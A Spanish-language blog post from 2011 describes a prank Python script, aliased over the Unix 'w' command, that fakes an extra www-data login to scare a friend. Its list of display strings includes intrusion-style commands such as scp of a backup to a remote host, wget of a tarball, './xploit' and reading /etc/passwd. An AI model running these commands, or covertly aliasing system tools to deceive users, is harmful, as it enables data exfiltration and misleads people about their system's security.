Asustando a un amigo con python xD
Sep 20, 2011
No Comments
Hace un tiempo atrás, escribí un pequeño script en python que utiliza el módulo subprocess para leer la salida del comando w y realizar un par de cambios, como incrementar en uno la cantidad de usuarios conectados y añadir un usuario conectado con una serie de párametros aleatorios (idle, jcpu, pcpu y what).
Con la intención de hacer una pequeña broma a un amigo mio, le deje el script como alias de w
alias w="python /usr/bin/w.py"
Resultado final, mi amigo paso un buen susto de 15 minutos pensando en una intrusión xD
import subprocess,re,random
wcmd = subprocess.Popen('/usr/bin/w', shell=False, stdout=subprocess.PIPE)
out = wcmd.communicate()
commands = ["ps aux", "cd ..", "scp backup.tgz root@remote-host.com:/tmp","ls","ls -a","last","less .bash_history","vim .bash_history","sshd: www-data [priv]", "sudo bash", "cat /etc/passwd", "passw" , "wget remote-host.com/utils.tgz" , "tar zxvf utils.tgz" , "./xploit" , "date" , "ps aux | grep xploit" , "ls utils" , "locate .bash_history" , "cd .." , "cd /" , "cd /root" , "cd /etc" , "ls /etc" ]
for line in out:
if line:
match = re.search( r' (\d+) users,', line )
if match:
users = int(match.group(1))+1
print line.replace( match.group(0) , ' ' + str(users) + ' users,' ),
print "www-data pts/0 localhost 10:47 0." + str( random.randint(0,9) ) + "0s 0."+ str( random.randint(0,9) ) +"0s 0.0"+str( random.randint(0,9) )+"s " + commands[ random.randint(0, len(commands)-1) ]
Articulos
Tips
This site uses valid HTML and CSS.
If you like what we do, please don't hestitate and subscribe to our